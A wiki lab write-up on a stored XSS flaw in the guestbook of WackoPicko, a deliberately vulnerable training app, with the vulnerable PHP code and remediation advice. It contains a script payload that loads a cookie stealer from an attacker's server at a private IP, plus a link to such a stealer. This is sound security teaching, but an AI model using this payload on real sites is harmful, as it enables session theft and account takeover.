WackoPicko/Stored-XSS

From aldeid
Jump to: navigation, search
You are here:
Stored XSS

Description

There is a stored XSS vulnerability in the guestbook page. The comment field is not properly escaped, and therefore, an attacker can exploit this vulnerability by creating a comment containing JavaScript code. Whenever a user visits the guestbook page, the attack will be triggered and the (possibly malicious) JavaScript code executed.

More information on stored XSS attacks.

Proof of Concept

In WackoPicko, click on the "Guestbook" tab and enter <script>alert('xss');</script> in the Comment field.

Wackopicko-stored-xss-1.png

By validating the form, it saves the content in the database. Each time you will click on the "Guestbook" tab, you will have a popup because the browser will execute the JavaScript code contained in the comments field.

Wackopicko-stored-xss-2.png

In an attack scenario, an attacker would exploit this vulnerability to steal cookies or for other malicious actions. To test it, we will use a cookie stealer, available here: http://xqus.com/php-cookie-stealer.

This time, enter this comment (192.168.100.14 is the server where the cookie stealer has been installed):

<script src="http://192.168.100.14/cookie_stealer.php"></script>

By browsing the page, it will silently steal your cookies and save the content in the cookies.txt file located on the attacker's server.

Wackopicko-stored-xss-3.png

How to detect

Some tools

How to protect against it?

Code

include/guestbook.php

The function get_all_guestbooks() lists all entries from table guestbook and returns the content, without sanitizing it:

function get_all_guestbooks()
{
  $query = sprintf("SELECT `id`, `name`, `comment`, `created_on` from `guestbook` ORDER BY created_on DESC;");
  $res = mysql_query($query);
  if ($res)
  {
      while ($row = mysql_fetch_assoc($res))
      {
	$to_return[] = $row;
      }
      return $to_return;
  }
  else
  {
      return False;
  }
}

guestbook.php

Then page guestbook.php lists all entries returned by the previous function, without sanitizing the content of the comments. It is only applied to the names (see function h() in the next section):

<?php
if ($guestbook)
{
  foreach ($guestbook as $guest)
  {
    ?>
    <p class="comment"><?= $guest["comment"] ?></p>
    <p> - by <?=h( $guest["name"] ) ?> </p>
    <?php
  } ?>

include/functions.php

This function sanitizes the "name" but is not applied to the "comment":

function h ($str)
{
   return htmlspecialchars($str);
}

The victim

Some wise advice:

  • Don't trust links in your mails: Never click or double-check (analyze the real link behind the href) links you receive in your mails

The developer

A vulnerability is the result of the developer's mistake. Vulnerabilities come from:

  • A lack of time during the development phase: Developers often have few days to develop an application. Under the pressure, mistakes and omissions are common.
  • Poor testing phase: Often, testing phase focuses on the application's functionalities more than on security issues. Don't forget to cover this part.
  • Lack of knowledge: Development is sometimes under the responsibility of beginners, which conducts to badly developed applications, especially for applications developed "from scratch". Use development frameworks that already implement security layers.

Comments